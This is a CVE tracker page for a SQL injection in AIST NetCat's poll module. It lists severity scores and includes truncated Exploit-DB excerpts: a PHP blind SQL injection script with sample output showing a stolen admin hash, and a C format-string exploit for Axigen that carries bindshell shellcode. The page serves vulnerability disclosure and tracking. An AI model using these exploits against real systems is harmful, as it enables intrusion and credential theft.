CVE-2008-6853
published 2009-07-07CVE-2008-6853: SQL injection vulnerability in modules/poll/index.php in AIST NetCat 3.0 and 3.12 allows remote attackers to execute arbitrary SQL commands via the PollID…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.3th percentile
SQL injection vulnerability in modules/poll/index.php in AIST NetCat 3.0 and 3.12 allows remote attackers to execute arbitrary SQL commands via the PollID parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netcat | netcat | — | — |
| netcat | netcat | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CMS NetCat 3.0/3.12 - Blind SQL Injection
exploitdb·2008-12-29
CVE-2008-6853 CMS NetCat 3.0/3.12 - Blind SQL Injection
CMS NetCat 3.0/3.12 - Blind SQL Injection
---
[+] Brute 42 symbol...
.....................................
[+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9
[+] Exploiting is finished successfully
[+] Login - admin
[+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9
[+] Decrypt MySQL hash and login into NetCat CMS.
*/
function http_connect($query)
{
global $server;
$headers = array(
'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
'Referer' => $server
);
$res_http = new HttpRequest($server."modules/poll/?cc=62&PollID=1".$query, HttpRequest::METH_GET);
$res_http->addHeaders($headers);
$t = mktime();
try {
$response = $res_http->send()->getBody();
$t = mktime() - $t;
if ($t > 4)
{
retu
Exploit-DB
Axigen 5.0.2 - AXIMilter Remote Format String
exploitdb·2008-01-21
CVE-2008-0434 Axigen 5.0.2 - AXIMilter Remote Format String
Axigen 5.0.2 - AXIMilter Remote Format String
---
/*
* Axigen 5.0.x AXIMilter Format String Exploit
*
* by hempel (JAN 16 2008)
*
* thx to mu-b (digit-labs.org)
*
*/
#include
#include
#include
#include
#include
#include
#include
char buf[] =
"FROM:\r\nEHLO:\r\nCNIP:\r\nCNPO:\r\nCNHO: "
/* offsets */
"\xb8\x96\x05\x08\xb9\x96\x05\x08\xba\x96\x05\x08\xbb\x96\x05\x08"
"\xbc\x96\x05\x08\xbd\x96\x05\x08\xbe\x96\x05\x08\xbf\x96\x05\x08"
"\xc0\x96\x05\x08"
/* format string */
"%35u%6851$n%70u%6850$hhn%47u%6846$hhn%36u%6854$hhn%31u%6853$hhn%"
"17u%6852$hhn%134u%6847$hhn%111u%6848$hhn%259u%6849$hhn"
"\r\nRCPT:\r\nVERI: "
/* bindshell code (port 4141) */
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdc"
"\xc8\x06\xb7\x83\xeb\xfc\xe2\xf4\xed\x13\x55\xf4\x8f\xa2\x04\xdd"
"\xba\x90\
No writeups or analysis indexed.
2009-07-07
Published